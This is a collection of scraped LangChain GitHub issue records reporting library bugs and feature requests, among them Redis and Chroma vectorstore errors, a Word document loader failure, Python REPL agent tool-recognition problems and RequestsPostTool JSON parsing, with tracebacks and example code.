I was experiencing another breaking change with #4717 that seems to have been resolved.
### Who can help?
@agola11 @vowelparrot
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [X] Callbacks/Tracing
- [ ] Async
### Reproduction
```py
import structlog
from langchain.callbacks import get_openai_callback
log = structlog.getLogger("main")
with get_openai_callback() as cb:
result = await agent.acall({ "input": body.prompt }, return_only_outputs=True)
openai_logger.info(
"openai charges",
prompt_tokens=cb.prompt_tokens,
completion_tokens=cb.completion_tokens,
total_tokens=cb.total_tokens,
total_cost=cb.total_cost,
successful_requests=cb.successful_requests,
user=user_id
)
```
### Expected behavior
I was expecting tokens and costs to token counts to appear. | Breaking Changes | OpenAI Callback | https://api.github.com/repos/langchain-ai/langchain/issues/4897/comments | 12 | 2023-05-18T02:51:23Z | 2024-03-18T16:04:34Z | https://github.com/langchain-ai/langchain/issues/4897 | 1,714,900,925 | 4,897 |
[
"hwchase17",
"langchain"
]
| ### System Info
```
Python 3.10.4
langchain==0.0.171
redis==3.5.3
redisearch==2.1.1
```
### Who can help?
@tylerhutcherson
### Information
- [ ] The official example notebooks/scripts
- [x] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I was able to override issue #3893 by temporarily disabling the ` _check_redis_module_exist`, post which I'm getting the below error when calling the `from_texts_return_keys` within the `from_documents` method in Redis class. Seems the argument `cls` is not needed in the `from_texts_return_keys` method, since it is already defined as a classmethod.
```
File "/workspaces/chatdataset_backend/adapters.py", line 96, in load
vectorstore = self.rds.from_documents(documents=documents, embedding=self.embeddings)
File "/home/codespace/.python/current/lib/python3.10/site-packages/langchain/vectorstores/base.py", line 296, in from_documents
return cls.from_texts(texts, embedding, metadatas=metadatas, **kwargs)
File "/home/codespace/.python/current/lib/python3.10/site-packages/langchain/vectorstores/redis.py", line 448, in from_texts
instance, _ = cls.from_texts_return_keys(
TypeError: Redis.from_texts_return_keys() got multiple values for argument 'cls'
```
### Expected behavior
Getting rid of cls argument from all the `Redis` class methods wherever required. Was able to solve the issue with this fix. | Redis Vectorstore: Redis.from_texts_return_keys() got multiple values for argument 'cls' | https://api.github.com/repos/langchain-ai/langchain/issues/4896/comments | 6 | 2023-05-18T02:46:53Z | 2023-09-22T16:09:08Z | https://github.com/langchain-ai/langchain/issues/4896 | 1,714,898,261 | 4,896 |
[
"hwchase17",
"langchain"
]
| ### System Info
- Softwares:
LangChain 0.0.171
Python 3.10.11
Jupyterlab 3.5.3
Anaconda 2.4.0
- Platforms:
Mac OSX Ventura 13.3.1
Apple M1 Max
### Who can help?
@eyurtsev please have a look on this issue. Thanks!
### Information
- [X] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [X] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
- Steps to reproduce the issue:
1. Prepare a word(docx) document that big enough(over 100MB)
2. Execute following code:
```
from langchain.document_loaders import UnstructuredWordDocumentLoader
loader = UnstructuredWordDocumentLoader("example_data/fake.docx", mode="elements")
data = loader.load()
```
- Error logs:
```
---------------------------------------------------------------------------
KeyError Traceback (most recent call last)
Cell In[53], line 1
----> 1 data = loader.load()
File ~/anaconda3/envs/ForLangChain/lib/python3.10/site-packages/langchain/document_loaders/unstructured.py:70, in UnstructuredBaseLoader.load(self)
68 def load(self) -> List[Document]:
69 """Load file."""
---> 70 elements = self._get_elements()
71 if self.mode == "elements":
72 docs: List[Document] = list()
File ~/anaconda3/envs/ForLangChain/lib/python3.10/site-packages/langchain/document_loaders/word_document.py:102, in UnstructuredWordDocumentLoader._get_elements(self)
99 else:
100 from unstructured.partition.docx import partition_docx
--> 102 return partition_docx(filename=self.file_path, **self.unstructured_kwargs)
File ~/anaconda3/envs/ForLangChain/lib/python3.10/site-packages/unstructured/partition/docx.py:121, in partition_docx(filename, file, metadata_filename)
118 exactly_one(filename=filename, file=file)
120 if filename is not None:
--> 121 document = docx.Document(filename)
122 elif file is not None:
123 document = docx.Document(
124 spooled_to_bytes_io_if_needed(cast(Union[BinaryIO, SpooledTemporaryFile], file)),
125 )
File ~/anaconda3/envs/ForLangChain/lib/python3.10/site-packages/docx/api.py:25, in Document(docx)
18 """
19 Return a |Document| object loaded from *docx*, where *docx* can be
20 either a path to a ``.docx`` file (a string) or a file-like object. If
21 *docx* is missing or ``None``, the built-in default document "template"
22 is loaded.
23 """
24 docx = _default_docx_path() if docx is None else docx
---> 25 document_part = Package.open(docx).main_document_part
26 if document_part.content_type != CT.WML_DOCUMENT_MAIN:
27 tmpl = "file '%s' is not a Word file, content type is '%s'"
File ~/anaconda3/envs/ForLangChain/lib/python3.10/site-packages/docx/opc/package.py:128, in OpcPackage.open(cls, pkg_file)
122 @classmethod
123 def open(cls, pkg_file):
124 """
125 Return an |OpcPackage| instance loaded with the contents of
126 *pkg_file*.
127 """
--> 128 pkg_reader = PackageReader.from_file(pkg_file)
129 package = cls()
130 Unmarshaller.unmarshal(pkg_reader, package, PartFactory)
File ~/anaconda3/envs/ForLangChain/lib/python3.10/site-packages/docx/opc/pkgreader.py:35, in PackageReader.from_file(pkg_file)
33 content_types = _ContentTypeMap.from_xml(phys_reader.content_types_xml)
34 pkg_srels = PackageReader._srels_for(phys_reader, PACKAGE_URI)
---> 35 sparts = PackageReader._load_serialized_parts(
36 phys_reader, pkg_srels, content_types
37 )
38 phys_reader.close()
39 return PackageReader(content_types, pkg_srels, sparts)
File ~/anaconda3/envs/ForLangChain/lib/python3.10/site-packages/docx/opc/pkgreader.py:69, in PackageReader._load_serialized_parts(phys_reader, pkg_srels, content_types)
67 sparts = []
68 part_walker = PackageReader._walk_phys_parts(phys_reader, pkg_srels)
---> 69 for partname, blob, reltype, srels in part_walker:
70 content_type = content_types[partname]
71 spart = _SerializedPart(
72 partname, content_type, reltype, blob, srels
73 )
File ~/anaconda3/envs/ForLangChain/lib/python3.10/site-packages/docx/opc/pkgreader.py:110, in PackageReader._walk_phys_parts(phys_reader, srels, visited_partnames)
106 yield (partname, blob, reltype, part_srels)
107 next_walker = PackageReader._walk_phys_parts(
108 phys_reader, part_srels, visited_partnames
109 )
--> 110 for partname, blob, reltype, srels in next_walker:
111 yield (partname, blob, reltype, srels)
File ~/anaconda3/envs/ForLangChain/lib/python3.10/site-packages/docx/opc/pkgreader.py:105, in PackageReader._walk_phys_parts(phys_reader, srels, visited_partnames)
103 reltype = srel.reltype
104 part_srels = PackageReader._srels_for(phys_reader, partname)
--> 105 blob = phys_reader.blob_for(partname)
106 yield (partname, blob, reltype, part_srels)
107 next_walker = PackageReader._walk_phys_parts(
108 phys_reader, part_srels, visited_partnames
109 )
File ~/anaconda3/envs/ForLangChain/lib/python3.10/site-packages/docx/opc/phys_pkg.py:108, in _ZipPkgReader.blob_for(self, pack_uri)
103 def blob_for(self, pack_uri):
104 """
105 Return blob corresponding to *pack_uri*. Raises |ValueError| if no
106 matching member is present in zip archive.
107 """
--> 108 return self._zipf.read(pack_uri.membername)
File ~/anaconda3/envs/ForLangChain/lib/python3.10/zipfile.py:1477, in ZipFile.read(self, name, pwd)
1475 def read(self, name, pwd=None):
1476 """Return file bytes for name."""
-> 1477 with self.open(name, "r", pwd) as fp:
1478 return fp.read()
File ~/anaconda3/envs/ForLangChain/lib/python3.10/zipfile.py:1516, in ZipFile.open(self, name, mode, pwd, force_zip64)
1513 zinfo._compresslevel = self.compresslevel
1514 else:
1515 # Get info object for name
-> 1516 zinfo = self.getinfo(name)
1518 if mode == 'w':
1519 return self._open_to_write(zinfo, force_zip64=force_zip64)
File ~/anaconda3/envs/ForLangChain/lib/python3.10/zipfile.py:1443, in ZipFile.getinfo(self, name)
1441 info = self.NameToInfo.get(name)
1442 if info is None:
-> 1443 raise KeyError(
1444 'There is no item named %r in the archive' % name)
1446 return info
KeyError: "There is no item named 'NULL' in the archive"
```
### Expected behavior
Loading a big size Word document should be OK without any issue. | Failed to load Word document over 100MB. | https://api.github.com/repos/langchain-ai/langchain/issues/4894/comments | 1 | 2023-05-18T01:39:56Z | 2023-09-10T16:15:57Z | https://github.com/langchain-ai/langchain/issues/4894 | 1,714,857,116 | 4,894 |
[
"hwchase17",
"langchain"
]
| ### System Info
Langchain version: 0.0.172
Platform: Linux (Ubuntu)
### Who can help?
@vowelparrot
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [X] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
When trying to use a python agent for simple queries, the agent often does not recognize Python REPL as a valid tool:
```
> Entering new AgentExecutor chain...
I can write a function to generate the nth fibonacci number and then call it with n=4.
Action: [Python REPL]
Action Input:
def fibonacci(n):
if n <= 1:
return n
else:
return fibonacci(n-1) + fibonacci(n-2)
print(fibonacci(4))
Observation: [Python REPL] is not a valid tool, try another one.
```
My instantiation of the agent:
```
custom_prefix = PREFIX + "When writing a code block, do not include the word 'python' after the first three ticks. You must graph your findings and save a .png of the graph on the local file system at [a path on my local machine]. The corpus consists of .txt files at this directory: [another path on my machine]."
python_agent = create_python_agent(llm=llm, tool=PythonREPLTool(), verbose=True, max_tokens=1000, prefix=custom_prefix)
python_agent("What are the top 10 bi-grams in the corpus? Only parse the .txt files. Translate the final n-grams to English for the chart.")
```
Model then gets stuck in a loop trying to use Python REPL. I included instructions in `custom_prefix` because the model repeatedly got this error, too:
```
> Entering new AgentExecutor chain...
I need to read in all the .txt files in the corpus and tokenize them into bi-grams. Then I need to count the frequency of each bi-gram and return the top 10.
Action: Python REPL
Action Input:
```python
import os
import nltk
from collections import Counter
from nltk import word_tokenize
from nltk.util import ngrams
corpus_dir = a directory on my machine
files = [os.path.join(corpus_dir, f) for f in os.listdir(corpus_dir) if f.endswith('.txt')]
bi_grams = []
for file in files:
with open(file, 'r') as f:
text = f.read()
tokens = word_tokenize(text)
bi_grams += ngrams(tokens, 2)
bi_gram_freq = Counter(bi_grams)
top_10_bi_grams = bi_gram_freq.most_common(10)
...
print(top_10_bi_grams)
```NameError("name 'python' is not defined")
```
### Expected behavior
I expect the Python agent to recognize PythonREPL as a valid tool. In fact, sometimes it does! But more often than not, it does not recognize PythonREPL as a tool. The query I included in the above code snippet worked maybe once in every 50 tries. | PythonREPL agent toolkit does not recognize PythonREPL as a valid tool | https://api.github.com/repos/langchain-ai/langchain/issues/4889/comments | 10 | 2023-05-17T23:26:11Z | 2024-06-06T13:04:03Z | https://github.com/langchain-ai/langchain/issues/4889 | 1,714,774,587 | 4,889 |
[
"hwchase17",
"langchain"
]
| Enviorment: DATABRICKS_RUNTIME_VERSION: 10.4
Python 3.8.10
Langchain 0.0.172
I was following along with the basic tutorial here: [Self-querying retriever with Chroma](https://python.langchain.com/en/latest/modules/indexes/retrievers/examples/chroma_self_query_retriever.html) and I keep getting **TypeError: 'NoneType' object is not callable** error. Also, when I call .get() on the vectorstore, the embeddings field is "None". Is this related to the error? Any idea what I'm doing wrong here? Many thanks.

**---------------------------------------------------------------------------------------------------------------------------------------------**
**My full code:**
from langchain.docstore.document import Document
docs = [
Document(page_content="A bunch of scientists bring back dinosaurs and mayhem breaks loose", metadata={"year": 1993, "rating": 7.7, "genre": "action"}),
Document(page_content="Leo DiCaprio gets lost in a dream within a dream within a dream within a ...", metadata={"year": 2010, "director": "Christopher Nolan", "rating": 8.2}),
Document(page_content="A psychologist / detective gets lost in a series of dreams within dreams within dreams and Inception reused the idea", metadata={"year": 2006, "director": "Satoshi Kon", "rating": 8.6}),
Document(page_content="A bunch of normal-sized women are supremely wholesome and some men pine after them", metadata={"year": 2019, "director": "Greta Gerwig", "rating": 8.3}),
Document(page_content="Toys come alive and have a blast doing so", metadata={"year": 1995, "genre": "animated"}),
Document(page_content="Three men walk into the Zone, three men walk out of the Zone", metadata={"year": 1979, "rating": 9.9, "director": "Andrei Tarkovsky", "genre": "science fiction", "rating": 9.9})
]
embeddings = OpenAIEmbeddings(chunk_size=1)
vectorstore = Chroma.from_documents(
docs, embeddings
)
from langchain.llms import OpenAI
from langchain.retrievers.self_query.base import SelfQueryRetriever
from langchain.chains.query_constructor.base import AttributeInfo
metadata_field_info=[
AttributeInfo(
name="genre",
description="The genre of the movie",
type="string or list[string]",
),
AttributeInfo(
name="year",
description="The year the movie was released",
type="integer",
),
AttributeInfo(
name="director",
description="The name of the movie director",
type="string",
),
AttributeInfo(
name="rating",
description="A 1-10 rating for the movie",
type="float"
),
]
document_content_description = "Brief summary of a movie"
llm = OpenAI(temperature=0)
retriever = SelfQueryRetriever.from_llm(llm, vectorstore, document_content_description, metadata_field_info, verbose=True)
**---------------------------------------------------------------------------------------------------------------------------------------------**
**TypeError Traceback (most recent call last)**
<command-1036279072864042> in <module>
27 document_content_description = "Brief summary of a movie"
28 llm = OpenAI(temperature=0)
---> 29 retriever = SelfQueryRetriever.from_llm(llm, vectorstore, document_content_description, metadata_field_info, verbose=True)
/databricks/python/lib/python3.8/site-packages/langchain/retrievers/self_query/base.py in from_llm(cls, llm, vectorstore, document_contents, metadata_field_info, structured_query_translator, chain_kwargs, enable_limit, **kwargs)
112 "allowed_operators"
113 ] = structured_query_translator.allowed_operators
--> 114 llm_chain = load_query_constructor_chain(
115 llm,
116 document_contents,
/databricks/python/lib/python3.8/site-packages/langchain/chains/query_constructor/base.py in load_query_constructor_chain(llm, document_contents, attribute_info, examples, allowed_comparators, allowed_operators, enable_limit, **kwargs)
123 **kwargs: Any,
124 ) -> LLMChain:
--> 125 prompt = _get_prompt(
126 document_contents,
127 attribute_info,
/databricks/python/lib/python3.8/site-packages/langchain/chains/query_constructor/base.py in _get_prompt(document_contents, attribute_info, examples, allowed_comparators, allowed_operators, enable_limit)
100 i=len(examples) + 1, content=document_contents, attributes=attribute_str
101 )
--> 102 output_parser = StructuredQueryOutputParser.from_components(
103 allowed_comparators=allowed_comparators, allowed_operators=allowed_operators
104 )
/databricks/python/lib/python3.8/site-packages/langchain/chains/query_constructor/base.py in from_components(cls, allowed_comparators, allowed_operators)
57 allowed_operators: Optional[Sequence[Operator]] = None,
58 ) -> StructuredQueryOutputParser:
---> 59 ast_parser = get_parser(
60 allowed_comparators=allowed_comparators, allowed_operators=allowed_operators
61 )
/databricks/python/lib/python3.8/site-packages/langchain/chains/query_constructor/parser.py in get_parser(allowed_comparators, allowed_operators)
127 allowed_operators: Optional[Sequence[Operator]] = None,
128 ) -> Lark:
--> 129 transformer = QueryTransformer(
130 allowed_comparators=allowed_comparators, allowed_operators=allowed_operators
131 )
| TypeError when using SelfQueryRetriever | https://api.github.com/repos/langchain-ai/langchain/issues/4887/comments | 8 | 2023-05-17T22:42:25Z | 2023-09-22T16:08:59Z | https://github.com/langchain-ai/langchain/issues/4887 | 1,714,743,745 | 4,887 |
[
"hwchase17",
"langchain"
]
| ### System Info
macos
langchain 0.0.172
### Who can help?
@vowelparrot
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [X] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. Used tool = AIPluginTool.from_plugin_url("http://localhost:4242/ai-plugin.json")
from local plugin, which nicely got a POST API request as a tool.
2. when executing a POST the message was:
`Thought:I need to use the MomoTodo API to create reminders for each meal tomorrow.
Action: requests_post
Action Input: json string {"url": "http://localhost:4242/momotodos", "data": {"title": "Reminder: Breakfast", "completed": false}}`
3. Action input is parsed in
https://github.com/hwchase17/langchain/blob/master/langchain/tools/requests/tool.py#L70
https://github.com/hwchase17/langchain/blob/master/langchain/tools/requests/tool.py#L18
So due to the prefix "json string" - there is a failure:
Observation: JSONDecodeError('Expecting value: line 1 column 1 (char 0)')
### Expected behavior
POST requests Action String should always be a JSON, but we can't expect the model to always put there clean JSON.
The input should be cleaned up and parsed properly. | RequestsPostTool parsing of the input text is naive and tend to fail since JSON has prefixes sometimes. | https://api.github.com/repos/langchain-ai/langchain/issues/4886/comments | 1 | 2023-05-17T22:18:43Z | 2023-09-10T16:16:03Z | https://github.com/langchain-ai/langchain/issues/4886 | 1,714,726,354 | 4,886 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
Hi there, the load_tools function implemented in https://python.langchain.com/en/latest/_modules/langchain/agents/load_tools.html won't accept custom tools. I'm trying to enrich Agent debates with tools discussed here https://python.langchain.com/en/latest/use_cases/agent_simulations/two_agent_debate_tools.html with a new prompt based tool:
```
@tool("optimistic_string")
def optimistic_string(input_string: str) -> str:
"""Rewrites the input string with a more optimistic tone."""
# Add your logic to process the input_string and generate the output_string
prompt = "Rewrite the following sentence with a more optimistic tone: {{input_string}}"
output_string = llm.generate(prompt) # Replace this with the actual call to the language model
return output_string
```
But it's not possible at the moment as an error is encoded in load_tools for unrecognized tools. How do we add custom tools to the simulation? Can anyone provide guidance? It is paramaunt to be able to customize tools to fully take advantage of agent based simulation. Thanks! :)
### Suggestion:
_No response_ | ValueError(f"Got unknown tool {name}") hardcoded for custom tools in load_tools.py | https://api.github.com/repos/langchain-ai/langchain/issues/4884/comments | 8 | 2023-05-17T22:06:33Z | 2023-05-20T16:32:10Z | https://github.com/langchain-ai/langchain/issues/4884 | 1,714,715,520 | 4,884 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I am trying to delete a single document from Chroma db using the following code:
chroma_db = Chroma(persist_directory = embeddings_save_path,
embedding_function = OpenAIEmbeddings(model = os.getenv("EMBEDDING_MODEL_NAME"),
chunk_size = 1,
max_retries = 5)
)
chroma_db._collection.delete(ids = list_of_ids)
chroma_db.persist()
However, the document is not actually being deleted. After loading/re-loading the chroma db from local, it is still showing the document in it.
I have tried the following things to fix the issue:
I have made sure that the list of ids is correct.
I have tried deleting the document multiple times.
I have tried restarting the Chroma db server.
None of these things have worked.
I am not sure why the document is not being deleted. I would appreciate any help in resolving this issue.
Thanks,
Anant Patankar
### Suggestion:
_No response_ | Issue: Chromadb document deletion not working | https://api.github.com/repos/langchain-ai/langchain/issues/4880/comments | 18 | 2023-05-17T20:16:45Z | 2024-08-10T13:28:34Z | https://github.com/langchain-ai/langchain/issues/4880 | 1,714,599,007 | 4,880 |
[
"hwchase17",
"langchain"
]
| ### Feature request
It would be helpful if we could define what file types we want to load via the [Google Drive loader](https://python.langchain.com/en/latest/modules/indexes/document_loaders/examples/google_drive.html#) i.e.: only docs or sheets or PDFs.
### Motivation
The current loads will load 3 file types: doc, sheet and pdf, but in my project I only want to load "application/vnd.google-apps.document".
### Your contribution
I'm happy to contribute with a PR. | Add the possibility to define what file types you want to load from a Google Drive | https://api.github.com/repos/langchain-ai/langchain/issues/4878/comments | 1 | 2023-05-17T19:46:54Z | 2023-09-10T16:16:08Z | https://github.com/langchain-ai/langchain/issues/4878 | 1,714,556,155 | 4,878 |
[
"hwchase17",
"langchain"
]
| ### System Info
I am trying to implement versioning of chains with prompt and llm config files separated from the chain.json file. When trying to call load_chain from langchain.chains with a chat-based LLM in the llm.json config, it yields:
[c:\Users\KellerBrown\.virtualenvs\llm_pipeline-pYWy7I0v\lib\site-packages\langchain\llms\openai.py:169](file:///C:/Users/KellerBrown/.virtualenvs/llm_pipeline-pYWy7I0v/lib/site-packages/langchain/llms/openai.py:169): UserWarning: You are trying to use a chat model. This way of initializing it is no longer supported. Instead, please use: `from langchain.chat_models import ChatOpenAI`
warnings.warn(
[c:\Users\KellerBrown\.virtualenvs\llm_pipeline-pYWy7I0v\lib\site-packages\langchain\llms\openai.py:696](file:///C:/Users/KellerBrown/.virtualenvs/llm_pipeline-pYWy7I0v/lib/site-packages/langchain/llms/openai.py:696): UserWarning: You are trying to use a chat model. This way of initializing it is no longer supported. Instead, please use: `from langchain.chat_models import ChatOpenAI`
warnings.warn(
I am not sure how to handle the issue, as I though load_chain could initialize any chain from a config. Is there a different function I should use to de-serialize chat-based chains?
### Who can help?
@hwchase17
@agola11
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
**chain.json**
{
"memory": null,
"verbose": false,
"prompt_path": "C:/Users/KellerBrown/Projects/llm_pipeline/function_configs/document_filter/0.0/prompt.json",
"llm_path": "C:/Users/KellerBrown/Projects/llm_pipeline/function_configs/document_filter/0.0/llm.json",
"output_key": "text",
"_type": "llm_chain"
}
**llm.json**
{
"model_name": "gpt-4",
"temperature": 0.0,
"max_tokens": 256,
"top_p": 1,
"frequency_penalty": 0,
"presence_penalty": 0,
"_type": "openai"
}
**prompt.json**
{
"input_variables": [
"topic",
"content"
],
"output_parser": null,
"template": "Answer 'Yes' or 'No' only. Does the following text contain language pertaining to {topic}? {content}",
"template_format": "f-string",
"_type": "prompt"
}
**Initializing chain from chain.json with path references to llm and prompt configs**
`chain = load_chain('function_configs/document_filter/0.0/chain.json')`
**Console Output**
[c:\Users\KellerBrown\.virtualenvs\llm_pipeline-pYWy7I0v\lib\site-packages\langchain\llms\openai.py:169](file:///C:/Users/KellerBrown/.virtualenvs/llm_pipeline-pYWy7I0v/lib/site-packages/langchain/llms/openai.py:169): UserWarning: You are trying to use a chat model. This way of initializing it is no longer supported. Instead, please use: `from langchain.chat_models import ChatOpenAI`
warnings.warn(
[c:\Users\KellerBrown\.virtualenvs\llm_pipeline-pYWy7I0v\lib\site-packages\langchain\llms\openai.py:696](file:///C:/Users/KellerBrown/.virtualenvs/llm_pipeline-pYWy7I0v/lib/site-packages/langchain/llms/openai.py:696): UserWarning: You are trying to use a chat model. This way of initializing it is no longer supported. Instead, please use: `from langchain.chat_models import ChatOpenAI`
warnings.warn(
### Expected behavior
No user warning. | load_chain giving UserWarning when llm.json configured for chat model | https://api.github.com/repos/langchain-ai/langchain/issues/4872/comments | 1 | 2023-05-17T18:07:04Z | 2023-09-10T16:16:13Z | https://github.com/langchain-ai/langchain/issues/4872 | 1,714,400,903 | 4,872 |
[
"hwchase17",
"langchain"
]
| ### Issue with current documentation:
One thing I constantly find myself doing is trying to dig up the prompts that are default for various agent notebook tutorials in the docs. If there was a link to the default prompts corresponding to each agent's mention, I wouldn't have to dig them up to find them, and the learning process for agents would be a lot smoother
### Idea or request for content:
Add links to the library's default prompts to notebooks that reference agents | DOC: Incorporate links to the underlying prompts in example docs | https://api.github.com/repos/langchain-ai/langchain/issues/4871/comments | 1 | 2023-05-17T18:04:53Z | 2023-09-10T16:16:18Z | https://github.com/langchain-ai/langchain/issues/4871 | 1,714,397,028 | 4,871 |
[
"hwchase17",
"langchain"
]
| ### System Info
Langchain 0.0.171, Python 3.9.0, OS Ubuntu 20.04.6 LTS
Hi @hwchase17 @agola11
Using dolly-v2-7b model with Langchain, I am [running into this issue ](https://github.com/databrickslabs/dolly/issues/174) my question is how to chain the input properly so that chunk from the first chain is fed into the next one, assuming that's the right way to avoid repetition instead of the whole generation, previously with dolly-v2-3b it resulted in repeating the same generation 3-4 times.
I am using the following code to generate sample NDAs after feeding it a FAISS vector store embeddings that were generated using [InstructorEmbedding ](https://instructor-embedding.github.io/)(not OpenAI) using [instructor-xl](https://huggingface.co/hkunlp/instructor-xl) but I am getting this error: The size of tensor a (2048) must match the size of tensor b (2049) at non-singleton dimension 3
```
prompt_template = """Use the context below to write a detailed 5000 words NDA between the two persons:
Context: {context}
Topic: {topic}
Disclosing Party: {disclosingparty}
Receiving Party: {receivingparty}
NDA:"""
PROMPT = PromptTemplate(
template=prompt_template, input_variables=["context", "topic", "disclosingparty", "receivingparty"]
)
llm = HuggingFacePipeline.from_model_id(model_id="dolly-v2-7b",
task="text-generation", model_kwargs={"temperature":0, "max_length":5000})
chain = LLMChain(llm=llm, prompt=PROMPT, output_key="nda_1")
prompt_template = """Using the NDA generated above within the same context as before, continue writing the nda:
Context: {nda_1}
NDA:"""
PROMPT = PromptTemplate(
template=prompt_template, input_variables=["nda_1"]
)
continue_chain = LLMChain(llm=llm, prompt=PROMPT, output_key="nda_2")
overall_chain = SequentialChain(chains=[chain, continue_chain],
input_variables=['context', 'topic', 'disclosingparty', 'receivingparty'],
output_variables=["nda_1", "nda_2"], verbose=True)
def generate_text(topic, disclosingparty, receivingparty):
docs = db_instructEmbedd.similarity_search(topic, k=4)
inputs = [{"context": doc.page_content, "topic": topic, "disclosingparty": disclosingparty, "receivingparty" : receivingparty} for doc in docs]
return overall_chain.apply(inputs)
response = generate_text("Based on this acquired knowledge, write a detailed NDA in 5000 words or less between these two parties on date May 15, 2023 governing rules of <country>, dont be repetitive and include all the required clauses to make it comprehensive contract", "Mr. X", "Mr. Y")
print(response)
```
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [X] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [X] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Running a Instructor-xl to generate embedding, using sequentialchains to generate
### Expected behavior
It should generate a long form text | Using Dolly-v2-7b with langchain getting error: The size of tensor a (2048) must match the size of tensor b (2049) at non-singleton dimension 3 | https://api.github.com/repos/langchain-ai/langchain/issues/4866/comments | 1 | 2023-05-17T16:27:08Z | 2023-09-10T16:16:23Z | https://github.com/langchain-ai/langchain/issues/4866 | 1,714,260,769 | 4,866 |
[
"hwchase17",
"langchain"
]
| ### Issue you'd like to raise.
I am using custom tools. I used zero shot react description agent and it was not giving the final answer. It stopped after using 1st tool.
So, I created a custom agent with custom examples in the prompt. It is still behaving the same way.
This is the output of the agent executer for one of the examples:
statement = 'a query to get the average outcome variable score of all the CSAT responses'
agent_executor.run(statement)
Output:
> Entering new AgentExecutor chain...
Thought : I need to paraphrase the statement to add more context.
Action : StatementFormattingTool[a query to get the average outcome variable score of all the CSAT responses]
Observation : Get the average outcome variable score for all CSAT responses from the kda_distribution_log_02c581c9912a4ca1af7a67cd46324cf1_llm_test table.
Its has to use SQLGenerationTool to get the query. It stopped after using the first tool. It is happening every time with other statemennts as well.
### Suggestion:
_No response_ | Langchain agent is not continuing the entire flow of execution | https://api.github.com/repos/langchain-ai/langchain/issues/4865/comments | 7 | 2023-05-17T16:12:55Z | 2024-07-15T07:20:59Z | https://github.com/langchain-ai/langchain/issues/4865 | 1,714,241,439 | 4,865 |
[
"hwchase17",
"langchain"
]
| ### code
```python
tool_ = load_tools(["serpapi"], serpapi_api_key=serpapi_api_key)
agent = initialize_agent(tool_, llm, agent="zero-shot-react-description", verbose=True, return_intermediate_steps=True)
response = agent({"input":"45*456=?"})
```
### log
> Entering new AgentExecutor chain...
I need to calculate this
Action: Search
Action Input: 45\*456
Observation: A. A person who is in a position of trust and confidence to a vulnerable adult shall use the vulnerable adult's assets solely for the benefit of the vulnerable ...
Thought: This isn't what I'm looking for
Action: Search
Action Input: 45\*456 math
Observation: The GCF of 45 and 456 is 3. Steps to find GCF. Find the prime factorization of 45 45 = 3 × 3 × 5; Find the prime factorization of 456
Thought: I can use this to calculate the answer
Action: Calculate
Action Input: 45\*456/3
Observation: Calculate is not a valid tool, try another one.
.......
> Finished chain.
text-davinci-003 failed to adhere to the prompt "Action: the action to take, should be one of [Search]." Therefore, we need to modify the prompt based on the LLM (Language Model) that we are utilizing.
### Suggestion:
_No response_ | Issue: The agent with the text-davinci-003 model and serpapi tool attempted to utilize a non-existent tool | https://api.github.com/repos/langchain-ai/langchain/issues/4863/comments | 3 | 2023-05-17T15:32:21Z | 2023-05-22T07:25:47Z | https://github.com/langchain-ai/langchain/issues/4863 | 1,714,170,658 | 4,863 |
[
"hwchase17",
"langchain"
]
| ### System Info
Langchain v0.0.171
Mac OS
### Who can help?
@jeffchuber
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
If I initialise a chroma database and then retriever
```
